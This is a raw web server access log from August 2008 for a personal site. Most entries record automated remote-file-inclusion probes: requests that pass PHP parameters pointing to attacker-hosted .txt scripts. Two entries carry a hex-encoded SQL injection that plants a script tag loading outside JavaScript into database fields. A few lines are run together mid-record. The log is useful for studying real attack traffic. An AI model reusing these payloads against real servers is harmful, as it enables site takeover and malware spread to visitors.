62.2.246.201 - - [21/Aug/2008:10:47:58 -0700] "GET /logs/access_080616.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://tvknob.com/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.17.17.82 - - [21/Aug/2008:10:48:00 -0700] "GET /errors.php?error=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
217.17.17.82 - - [21/Aug/2008:10:48:02 -0700] "GET /logs/access_080730.log/errors.php?error=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
217.17.17.82 - - [21/Aug/2008:10:48:02 -0700] "GET /logs/errors.php?error=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
91.121.143.183 - - [21/Aug/2008:10:48:07 -0700] "GET /logs/access_080717.log/errors.php?error=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.143.183 - - [21/Aug/2008:10:48:08 -0700] "GET /errors.php?error=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.143.183 - - [21/Aug/2008:10:48:08 -0700] "GET /logs/errors.php?error=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.55.113.226 - - [21/Aug/2008:10:48:30 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.latinoconvention.com/mambots/system/.sys/.../idfast.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.178.147.89 - - [21/Aug/2008:10:48:33 -0700] "GET /logs/access_080321.log/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.topyn.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:10:48:43 -0700] "GET /logs/access_080812.log/layout/default/params.php?gConf[dir][layouts]=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
91.121.143.183 - - [21/Aug/2008:10:48:45 -0700] "GET /logs/access_080515.log/errors.php?error=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
118.129.166.13 - - [21/Aug/2008:10:48:58 -0700] "GET /logs/access_080717.log/errors.php?error=http://roux.be/Joomla/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.129.166.13 - - [21/Aug/2008:10:48:59 -0700] "GET /errors.php?error=http://roux.be/Joomla/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.129.166.13 - - [21/Aug/2008:10:48:59 -0700] "GET /logs/errors.php?error=http://roux.be/Joomla/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:10:49:10 -0700] "GET /logs/access_080809.log/layout/default/params.php?gConf[dir][layouts]=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:10:49:10 -0700] "GET /layout/default/params.php?gConf[dir][layouts]=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:10:49:10 -0700] "GET /logs/layout/default/params.php?gConf[dir][layouts]=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
217.17.17.82 - - [21/Aug/2008:10:49:13 -0700] "GET /logs/access_080805.log/errors.php?error=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:10:49:26 -0700] "GET /logs/access_080710.log%20/?sourcedir=http://russianinterpreter.ru/images/stories/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
118.129.166.13 - - [21/Aug/2008:10:49:28 -0700] "GET /logs/access_080515.log/errors.php?error=http://roux.be/Joomla/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:10:49:34 -0700] "GET /logs/access_080526.log%20/?sourcedir=http://russianinterpreter.ru/images/stories/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.231.35.38 - - [21/Aug/2008:10:49:56 -0700] "GET /logs/access_080803.log/errors.php?error=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
217.17.142.173 - - [21/Aug/2008:10:50:13 -0700] "GET //errors.php?error=http://www.sellnation.com/admin/classes/log/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.17.142.173 - - [21/Aug/2008:10:50:13 -0700] "GET /logs/access_080305.log//errors.php?error=http://www.sellnation.com/admin/classes/log/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.17.142.173 - - [21/Aug/2008:10:50:13 -0700] "GET /logs//errors.php?error=http://www.sellnation.com/admin/classes/log/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.17.142.173 - - [21/Aug/2008:10:50:28 -0700] "GET /logs/access_080504.log//errors.php?error=http://www.sellnation.com/admin/classes/log/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.186 - - [21/Aug/2008:10:50:35 -0700] "GET /bikes/dteel/2008_02_15/?M=A HTTP/1.0" 200 1118 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:10:50:54 -0700] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:10:50:55 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:10:50:56 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 200 9889 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
58.120.225.104 - - [21/Aug/2008:10:51:00 -0700] "GET /logs/access_080421.log/errors.php?error=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:10:51:04 -0700] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
58.120.225.104 - - [21/Aug/2008:10:51:05 -0700] "GET /logs/access_080802.log/errors.php?error=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
217.17.17.82 - - [21/Aug/2008:10:51:12 -0700] "GET /logs/access_080803.log/errors.php?error=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:10:51:16 -0700] "GET /logs/access_080812.log/layout/default/params.php?gConf[dir][layouts]=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
195.149.115.2 - - [21/Aug/2008:10:51:17 -0700] "GET /logs/announcements.php?phpraid_dir=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.149.115.2 - - [21/Aug/2008:10:51:18 -0700] "GET /announcements.php?phpraid_dir=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
198.66.222.121 - - [21/Aug/2008:10:51:25 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
198.66.222.121 - - [21/Aug/2008:10:51:26 -0700] "GET /logs/access_080503.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
198.66.222.121 - - [21/Aug/2008:10:51:26 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.120.225.104 - - [21/Aug/2008:10:51:34 -0700] "GET /logs/access_080803.log/errors.php?error=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
198.66.222.121 - - [21/Aug/2008:10:51:35 -0700] "GET /logs/access_080308.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.17.17.82 - - [21/Aug/2008:10:51:38 -0700] "GET /logs/access_080421.log/errors.php?error=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
217.17.142.173 - - [21/Aug/2008:10:51:58 -0700] "GET /logs/access_080809.log//layout/default/params.php?gConf[dir][layouts]=http://www.sellnation.com/admin/classes/log/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.17.142.173 - - [21/Aug/2008:10:51:58 -0700] "GET //layout/default/params.php?gConf[dir][layouts]=http://www.sellnation.com/admin/classes/log/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.17.142.173 - - [21/Aug/2008:10:51:58 -0700] "GET /logs/access_080812.log//layout/default/params.php?gConf[dir][layouts]=http://www.sellnation.com/admin/classes/log/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.88.226.121 - - [21/Aug/2008:10:52:01 -0700] "GET /visible_count_inc.php?statitpath=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
70.88.226.121 - - [21/Aug/2008:10:52:01 -0700] "GET /logs/visible_count_inc.php?statitpath=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
217.17.142.173 - - [21/Aug/2008:10:52:01 -0700] "GET /logs//layout/default/params.php?gConf[dir][layouts]=http://www.sellnation.com/admin/classes/log/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.230.22.202 - - [21/Aug/2008:10:52:04 -0700] "GET /logs/access_080503.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.22.202 - - [21/Aug/2008:10:52:04 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.22.202 - - [21/Aug/2008:10:52:04 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.22.202 - - [21/Aug/2008:10:52:08 -0700] "GET /logs/access_080308.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:10:52:11 -0700] "GET /index1.php?choix=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.80.193.39 - - [21/Aug/2008:10:52:11 -0700] "GET / HTTP/1.0" 200 9793 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; MSN 6.1; MSNbMSFT; MSNmen-us; MSNcOTH)" "dmulk.com"
118.45.190.171 - - [21/Aug/2008:10:52:21 -0700] "GET /logs/errors.php?error=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
118.45.190.171 - - [21/Aug/2008:10:52:21 -0700] "GET /errors.php?error=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
118.45.190.171 - - [21/Aug/2008:10:52:23 -0700] "GET /logs/access_080730.log/errors.php?error=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
204.15.10.22 - - [21/Aug/2008:10:52:48 -0700] "GET /logs/access_080619.log/index.php?meio=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.22 - - [21/Aug/2008:10:52:48 -0700] "GET /logs/access_080510.log/index.php?meio=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.22 - - [21/Aug/2008:10:52:48 -0700] "GET /logs/index.php?meio=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.22 - - [21/Aug/2008:10:52:49 -0700] "GET /index.php?meio=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 200 9903 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.160 - - [21/Aug/2008:10:53:04 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://russianinterpreter.ru/administrator/templates/mambo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.160 - - [21/Aug/2008:10:53:05 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://russianinterpreter.ru/administrator/templates/mambo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.22 - - [21/Aug/2008:10:53:19 -0700] "GET /logs/access_080806.log/index.php?content=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.22 - - [21/Aug/2008:10:53:20 -0700] "GET /index.php?content=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 200 9906 "-" "libwww-perl/5.810" "www.dmulk.com"
211.141.87.6 - - [21/Aug/2008:10:53:29 -0700] "GET /logs/access_080703.log/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.141.87.6 - - [21/Aug/2008:10:53:30 -0700] "GET /?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 200 9928 "-" "libwww-perl/5.805" "www.dmulk.com"
211.141.87.6 - - [21/Aug/2008:10:53:31 -0700] "GET /logs/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 200 61570 "-" "libwww-perl/5.805" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:10:53:35 -0700] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:10:53:36 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:10:53:36 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 200 9889 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
72.29.68.160 - - [21/Aug/2008:10:53:41 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://russianinterpreter.ru/administrator/templates/mambo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.160 - - [21/Aug/2008:10:53:41 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://russianinterpreter.ru/administrator/templates/mambo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:10:53:48 -0700] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
119.63.193.186 - - [21/Aug/2008:10:53:59 -0700] "HEAD /retreat1/webcam/retreat1_00590.jpg HTTP/1.1" 200 0 "-" "BaiduImagespider+(+http://help.baidu.jp/system/05.html)" "www.dmulk.com"
119.63.193.186 - - [21/Aug/2008:10:53:59 -0700] "GET /retreat1/webcam/retreat1_00590.jpg HTTP/1.1" 200 55318 "-" "BaiduImagespider+(+http://help.baidu.jp/system/05.html)" "www.dmulk.com"
118.45.190.171 - - [21/Aug/2008:10:54:13 -0700] "GET /logs/access_080803.log/errors.php?error=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:10:54:20 -0700] "GET /logs/access_080704.log/index1.php?choix=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:10:54:34 -0700] "GET /index1.php?choix=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:10:54:49 -0700] "GET /logs/index1.php?choix=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:10:54:53 -0700] "GET /logs/access_080730.log/index1.php?choix=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.15.10.22 - - [21/Aug/2008:10:55:22 -0700] "GET /logs/access_080803.log/index.php?meio=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
118.129.166.13 - - [21/Aug/2008:10:55:49 -0700] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://roux.be/Joomla/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.129.166.13 - - [21/Aug/2008:10:55:50 -0700] "GET //index.php?DOCUMENT_ROOT=http://roux.be/Joomla/id.txt? HTTP/1.1" 200 9869 "-" "libwww-perl/5.79" "www.dmulk.com"
72.52.143.147 - - [21/Aug/2008:10:55:50 -0700] "GET /components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
72.52.143.147 - - [21/Aug/2008:10:55:50 -0700] "GET /logs/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
118.129.166.13 - - [21/Aug/2008:10:55:50 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://roux.be/Joomla/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.17.142.173 - - [21/Aug/2008:10:55:56 -0700] "GET /logs/access_080812.log%20//layout/default/params.php?gConf[dir][layouts]=http://www.sellnation.com/admin/classes/log/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.186 - - [21/Aug/2008:10:56:15 -0700] "GET /minamijewelry/source_images/batch1/?D=A HTTP/1.0" 200 5016 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
83.133.96.246 - - [21/Aug/2008:10:56:28 -0700] "GET /logs/access_080723.log/index.php?_SERVER[DOCUMENT_ROOT]=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
83.133.96.246 - - [21/Aug/2008:10:56:29 -0700] "GET /logs/index.php?_SERVER[DOCUMENT_ROOT]=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
83.133.96.246 - - [21/Aug/2008:10:56:29 -0700] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 200 9935 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
194.120.78.70 - - [21/Aug/2008:10:56:36 -0700] "GET /logs/access_080218.log?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E31303030796C632E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272Bhomedecorcenter/us1:24.989.208.43.121 - - [21/Aug/2008:10:56:44 -0700] "GET /logs/access_080804.log/?sourcedir=http://russianinterpreter.ru/images/stories/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:10:56:44 -0700] "GET /logs/access_080803.log/?sourcedir=http://russianinterpreter.ru/images/stories/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.120.78.70 - - [21/Aug/2008:10:56:46 -0700] "GET /logs/access_080218.log?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E31303030796C632E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B4thukhaaung/us1:24.186.1074.6.22.186 - - [21/Aug/2008:10:56:57 -0700] "GET /logs/access_080812.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
218.189.215.148 - - [21/Aug/2008:10:57:07 -0700] "GET /logs/access_080611.log/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.189.215.148 - - [21/Aug/2008:10:57:08 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.0" 200 9893 "-" "libwww-perl/5.805" "www.dmulk.com"
218.189.215.148 - - [21/Aug/2008:10:57:09 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
